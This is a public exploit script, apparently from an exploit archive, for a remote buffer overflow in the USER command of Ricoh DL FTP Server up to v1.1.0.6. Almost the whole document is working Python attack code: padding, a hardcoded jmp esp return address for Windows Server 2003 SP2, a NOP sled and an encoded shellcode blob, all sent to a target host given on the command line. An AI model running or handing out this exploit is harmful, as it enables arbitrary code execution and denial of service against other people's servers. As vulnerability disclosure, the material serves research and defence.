'''
Information
--------------------
Name : Ricoh FTP Server <= v1.1.0.6
Software : Ricoh DL-1 SR10.exe
Vendor Homepage : http://www.ricohpmmc.com/
Vulnerability Type : Remote Buffer Overflow
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] exploitpack [dot] com>

Description
------------------

Ricoh DL FTP Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary-checks on user-supplied
data.
Successfully exploitation of this bug could potentially allow an attacker
to execute
arbitrary code within the context of the affected application. Failed
exploit attempts could result in a denial-of-service condition.


Exploit example as follow
-----------------------------
Basic structure: JUNK + JMPIP + NOPS + SHELLCODE
Vulnerable command: USER

!/usr/bin/python
Based on the work of Julien Ahrens:
https://www.exploit-db.com/exploits/18643/
'''
import os
import socket
import sys


def howtousage():
    print "Sorry, expecting arguments: host port"
    sys.exit(-1)

def run():
    try:
        shell = "\xba\xc9\xd2\x95\xec\xda\xd8\xd9\x74\x24\xf4\x5b\x33"
        shell += "\xc9\xb1\x44\x83\xc3\x04\x31\x53\x0f\x03\x53\xc6\x30"
        shell += "\x60\x10\x30\x36\x8b\xe9\xc0\x57\x05\x0c\xf1\x57\x71"
        shell += "\x44\xa1\x67\xf1\x08\x4d\x03\x57\xb9\xc6\x61\x70\xce"
        shell += "\x6f\xcf\xa6\xe1\x70\x7c\x9a\x60\xf2\x7f\xcf\x42\xcb"
        shell += "\x4f\x02\x82\x0c\xad\xef\xd6\xc5\xb9\x42\xc7\x62\xf7"
        shell += "\x5e\x6c\x38\x19\xe7\x91\x88\x18\xc6\x07\x83\x42\xc8"
        shell += "\xa6\x40\xff\x41\xb1\x85\x3a\x1b\x4a\x7d\xb0\x9a\x9a"
        shell += "\x4c\x39\x30\xe3\x61\xc8\x48\x23\x45\x33\x3f\x5d\xb6"
        shell += "\xce\x38\x9a\xc5\x14\xcc\x39\x6d\xde\x76\xe6\x8c\x33"
        shell += "\xe0\x6d\x82\xf8\x66\x29\x86\xff\xab\x41\xb2\x74\x4a"
        shell += "\x86\x33\xce\x69\x02\x18\x94\x10\x13\xc4\x7b\x2c\x43"
        shell += "\xa7\x24\x88\x0f\x45\x30\xa1\x4d\x03\xc7\x37\xe8\x61"
        shell += "\xc7\x47\xf3\xd5\xa0\x76\x78\xba\xb7\x86\xab\xff\x48"
        shell += "\xcd\xf6\xa9\xc0\x88\x62\xe8\x8c\x2a\x59\x2e\xa9\xa8"
        shell += "\x68\xce\x4e\xb0\x18\xcb\x0b\x76\xf0\xa1\x04\x13\xf6"
        shell += "\x16\x24\x36\x95\xf5\xbe\x97\x3f\x7d\x5a\xc8\x90\x1e"
        shell += "\x84\x66\x8a\x94\xe4\x03\x27\x31\x97\xcb\xb5\xd0\x34"
        shell += "\x63\x52\x02\xe9\x12\xc1\x2d\x65\xd4\x34\x81\x43\x36"
        shell += "\x18\xa0\xef\x72\x46\x04\xd6\x5a\xe8\x2d\x62\xbb\x98"
        shell += "\xc2\xe9\xda\x0c\x7b\x9c\x73\xb8\xf3\x40\xcd\x26\x9e"
        shell += "\xe9\xa3\xcf\x13\x9e\x49\x71\xa7\x31\xdc\x02\x67\xbc"
        shell += "\x49\x86\x08\x28\xaa\x67\x97\xec\xee\x77"
        # User: ricoh
        # Pass: Ricoh1106

        junk = "\x61" * 245
        jmp = "\x38\x07\xD2\x77" # jmp esp from user32.dll # Windows Server
2003 Standard Edition  SP2 English USER32.DLL jmp esp 0x77D20738 G DV UV
        nops = "\x90" * 16

        buffer = junk + jmp + nops + shell
        s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s1.connect((Host, int(Port)))
        s1.recv(1024)
        s1.send('USER ' + buffer + '\r\n')
        s1.close()
        print "Exploit executed successfully"
    except:
        print "Target not vulnerable or connection closed"

if __name__ == '__main__':
    print "Ricoh DC FTP Server <= v1.1.0.6 Remote Buffer Overflow"
    print "Author: Juan Sacco"

    try:
        Host = sys.argv[1]
        Port = sys.argv[2]
    except IndexError:
        howtousage()
run()